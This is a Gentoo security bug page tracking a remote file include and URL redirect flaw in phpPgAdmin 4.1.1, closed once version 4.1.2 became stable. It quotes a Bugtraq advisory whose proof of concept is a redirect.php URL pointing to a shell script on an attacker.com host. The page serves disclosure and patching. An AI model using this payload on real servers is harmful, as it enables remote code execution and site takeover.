Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 180516 - dev-db/phppgadmin < 4.1.2 Remote File Include & Url Redirecting Vulnerabilitiy
Summary: dev-db/phppgadmin < 4.1.2 Remote File Include & Url Redirecting Vulnerabilitiy
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High normal (vote)
Assignee: Gentoo Security
URL: http://www.securityfocus.com/archive/...
Whiteboard: B4 [noglsa] jaervosz
Keywords:
Depends on:
Blocks:
 
Reported: 2007-06-01 06:16 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2007-07-15 15:13 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-06-01 06:16:12 UTC
Another issue was reported on Bugtraq.

Xmor$ Security Vulnerability Research TM
 
 # Tilte: phpPgAdmin-4.1.1 Remote File Include & Url Redirecting Vulnerabilitiy
 
 # Author..................: [the_Edit0r]
 # HomePage ...............: [Www.XmorS-sEcurity.coM]
 [Www.XmorS.coM] [Www.XmorS.neT]
 # Location ...............: [Iran]
 # Software ...............: [phpPgAdmin] 
 # Impact..................: [ Remote & url Redirecting ]
 # Site Script ............: [http://phppgadmin.sourceforge.net]
 # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]
 # SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM]
 
 ------------------------------- proof Of Concept ---------------------------
 
 www.example.com/[path]/redirect.php?url=[Shell-Script] & [ Url Redirecting ]
 
 Ex:
 
 1-Shell----> http://Sitename/[path]/redirect.php?url=http://www.attacker.com/shell.tx
 t
 
 2-url Redirecting ------> http://sitename/[path]/redirect.php?url=http://www.Google.coM
 
 ------------------------------------------------------------------------
 ----
 
 # Contact me : the_3dit0r[at]Yahoo[dot]coM
 
 # [XmorS-SEcurity.coM]
Comment 1 Tiziano Müller (RETIRED) gentoo-dev 2007-06-01 06:41:19 UTC
hmm, it's basically the same as the other one, but more specific.
Comment 2 Pierre-Yves Rofes (RETIRED) gentoo-dev 2007-07-15 15:13:19 UTC
4.1.2 is now stable, so I guess we can close this one wrt bug #180133. Feel free to reopen if you disagree.